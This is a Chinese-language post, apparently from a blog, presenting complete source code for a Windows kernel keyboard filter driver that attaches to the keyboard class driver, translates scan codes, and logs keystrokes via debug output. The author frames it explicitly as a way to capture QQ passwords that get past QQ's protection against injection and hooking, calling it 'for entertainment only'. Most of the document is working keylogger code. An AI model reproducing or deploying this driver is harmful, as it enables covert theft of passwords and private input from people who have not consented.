由于 QQ 密码做了特殊的保护,所以通过远程注入得到密码框内容以及通过钩子来得到键盘消息均不能探测到 QQ 的密码,但是通过对键盘驱动的过滤却是可以记录下 QQ 密码输入期间的内容,附上源码。

#define DBG 1#include <ntddk.h>
#include <ntstrsafe.h>#include "KeyMonitor.h"extern POBJECT_TYPE IoDriverObjectType;PIO_STACK_LOCATION g_islCompletion;
int g_caps, g_shift, g_num;unsigned char asciiTbl[]={0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //normal0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E,0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //caps0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E,0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //shift0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E,0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //caps + shift0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E
};NTSTATUS
ObReferenceObjectByName (__in PUNICODE_STRING ObjectName,__in ULONG Attributes,__in_opt PACCESS_STATE AccessState,__in_opt ACCESS_MASK DesiredAccess,__in POBJECT_TYPE ObjectType,__in KPROCESSOR_MODE AccessMode,__inout_opt PVOID ParseContext,__out PVOID *Object);VOID KMUnload(IN PDRIVER_OBJECT pDriverObject);
NTSTATUS KMUnHandleIrp(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMOpenClose(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMPnp(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMPower(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMAddDevice(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath);
NTSTATUS KMRead(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMReadCompletion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
void KMPrintKey(UCHAR sch);NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath)
{int i = 0;KdPrint(("This is my driver, Henzox!\n"));pDriverObject->DriverUnload = KMUnload;for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION + 1; i++) {pDriverObject->MajorFunction[i] = KMUnHandleIrp;} pDriverObject->MajorFunction[IRP_MJ_CREATE] = KMOpenClose;pDriverObject->MajorFunction[IRP_MJ_CLOSE] = KMOpenClose;pDriverObject->MajorFunction[IRP_MJ_PNP] = KMPnp;pDriverObject->MajorFunction[IRP_MJ_POWER] = KMPower;pDriverObject->MajorFunction[IRP_MJ_READ] = KMRead;return KMAddDevice(pDriverObject, puServiceRegPath);
}VOID KMUnload(IN PDRIVER_OBJECT pDriverObject)
{PDEVICE_OBJECT tmpDevice;PMY_DEVICE_EXTENSION myDeviceExtension;KdPrint(("The unload function is invoked!\n"));tmpDevice = pDriverObject->DeviceObject;while (tmpDevice) {PDEVICE_OBJECT nextDevice;KdPrint(("delete devobj: 0x%p.\n",tmpDevice));myDeviceExtension = (PMY_DEVICE_EXTENSION)tmpDevice->DeviceExtension;// 如果还有完成例程没有执行,则取消掉这个完成例程if (myDeviceExtension->IslCompletion) {myDeviceExtension->IslCompletion->CompletionRoutine = NULL;// 只去掉与完成例程相关的几个标志位,栈内的其它标志位非常重要,不能去除myDeviceExtension->IslCompletion->Control &= ~(SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_CANCEL | SL_INVOKE_ON_ERROR);}IoDetachDevice(myDeviceExtension->AttachedTo);nextDevice = tmpDevice->NextDevice;IoDeleteDevice(tmpDevice);tmpDevice = nextDevice;}
}NTSTATUS KMUnHandleIrp(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{KdPrint(("Irp: %d\n", IoGetCurrentIrpStackLocation(Irp)->MajorFunction));IoSkipCurrentIrpStackLocation(Irp);return IoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);
}NTSTATUS KMOpenClose(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{KdPrint(("KMOpenClose.\n"));Irp->IoStatus.Status = STATUS_SUCCESS;Irp->IoStatus.Information = 0;IoCompleteRequest(Irp, IO_NO_INCREMENT);return STATUS_SUCCESS;
}NTSTATUS KMPnp(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{PIO_STACK_LOCATION pIo = IoGetCurrentIrpStackLocation(Irp);KdPrint(("KMPnp.\n"));switch (pIo->MinorFunction) {default:IoSkipCurrentIrpStackLocation(Irp);IoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);break;}return STATUS_SUCCESS;
}NTSTATUS KMPower(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{KdPrint(("KMPower.\n"));IoSkipCurrentIrpStackLocation(Irp);PoStartNextPowerIrp(Irp);return PoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);
}NTSTATUS KMAddDevice(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath)
{UNICODE_STRING usObjectName;PDRIVER_OBJECT KbdDriver;NTSTATUS status;PDEVICE_OBJECT tmpDevice, myDevice;UNICODE_STRING usDeviceName;WCHAR buff[64];int index = 0;PMY_DEVICE_EXTENSION DeviceExtension;RtlInitUnicodeString(&usObjectName, L"\\Driver\\KbdClass");status = ObReferenceObjectByName(&usObjectName,OBJ_CASE_INSENSITIVE,NULL,0,IoDriverObjectType,KernelMode,NULL,(PVOID)&KbdDriver);if (!NT_SUCCESS(status)) {KdPrint(("Find the kbd class failed!\n"));return status;}tmpDevice = KbdDriver->DeviceObject;while (tmpDevice) {swprintf(buff, L"\\Device\\MyDevice%d", index++);RtlInitUnicodeString(&usDeviceName, buff);status = IoCreateDevice(pDriverObject,sizeof(MY_DEVICE_EXTENSION),&usDeviceName,tmpDevice->DeviceType,tmpDevice->Characteristics,FALSE,&myDevice);if (!NT_SUCCESS(status)) {ObDereferenceObject(KbdDriver);return status;}KdPrint(("devobj: 0x%p.\n",myDevice));IoAttachDeviceToDeviceStack(myDevice, tmpDevice);DeviceExtension = (PMY_DEVICE_EXTENSION)myDevice->DeviceExtension;DeviceExtension->AttachedTo = tmpDevice;/* Setup my device */myDevice->StackSize = tmpDevice->StackSize + 1;myDevice->Flags |= (tmpDevice->Flags & (DO_BUFFERED_IO));          // 在 IoCreateDevice 时 Flags 会被赋于一些标志,这里应该保留这些标志,(如 DO_DEVICE_HAS_NAME 等,牵涉到引用计数)tmpDevice = tmpDevice->NextDevice;}ObDereferenceObject(KbdDriver);return STATUS_SUCCESS;
}NTSTATUS KMRead(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{PMY_DEVICE_EXTENSION myDeviceExtension;//KdPrint(("KMRead.\n"));myDeviceExtension = (PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension;IoCopyCurrentIrpStackLocationToNext(Irp);/* 只有驱动可以保证在完成例程被调用之前不被卸载的情况下,可以使用 IoSetCompletionRoutine,如果你不能保证,那么就需要用 IoSetCompletionRoutineEx,让内核来使驱动不被卸载*//*IoSetCompletionRoutine(Irp,KMReadCompletion,NULL,TRUE,TRUE,TRUE);*/IoSetCompletionRoutineEx(DeviceObject,Irp,KMReadCompletion,NULL,TRUE,TRUE,TRUE);myDeviceExtension->IslCompletion = IoGetNextIrpStackLocation(Irp);return IoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);
}NTSTATUS KMReadCompletion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{PMY_DEVICE_EXTENSION myDeviceExtension;PUCHAR buff;int len;//KdPrint(("KMReadCompletion: Key--0x%p\n", *(PULONG)Irp->AssociatedIrp.SystemBuffer));/* 该次 IRP 的完成例程已执行,栈会在该函数执行完时自动清空,所以不应该在引用该栈 */myDeviceExtension = (PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension;myDeviceExtension->IslCompletion = NULL;if (NT_SUCCESS(Irp->IoStatus.Status)) {// 由于设备标志为 DO_BUFFERED_IO, 内核分配了该缓冲区buff = Irp->AssociatedIrp.SystemBuffer;// 返回值一般都保存在 Information 中,即长度len = Irp->IoStatus.Information;if (buff[4] == 0) {/* 键盘被按下 */switch (buff[2]) {case 0x3A:g_caps = (g_caps == 1)?0:1;break;case 0x2A:case 0x36:g_shift = 1;break;case 0x45:g_num = (g_num == 1)?0:1;break;default:KMPrintKey(buff[2]);break;}} else if (buff[4] == 1) {/* 键盘被释放 */switch (buff[2]) {case 0x2A:case 0x36:g_shift = 0;break;default: break;}}}if (Irp->PendingReturned) {IoMarkIrpPending(Irp);}return Irp->IoStatus.Status;
}void KMPrintKey(UCHAR sch)
{UCHAR ch = 0;if ((sch < 0x47) || ((sch >= 0x47 && sch < 0x54) && g_num==0)) {ch = asciiTbl[sch];if(g_shift && g_caps)ch = asciiTbl[sch+84*3];else if(g_shift==1)ch = asciiTbl[sch+84*2];else if(g_caps==1)ch = asciiTbl[sch+84];}if(ch==0x08){//DbgPrint("退格");}if (ch >= 0x20 && ch < 0x7F){DbgPrint("%C",ch);}
}

键盘映射表来源于网络。整段代码仅供娱乐使用。
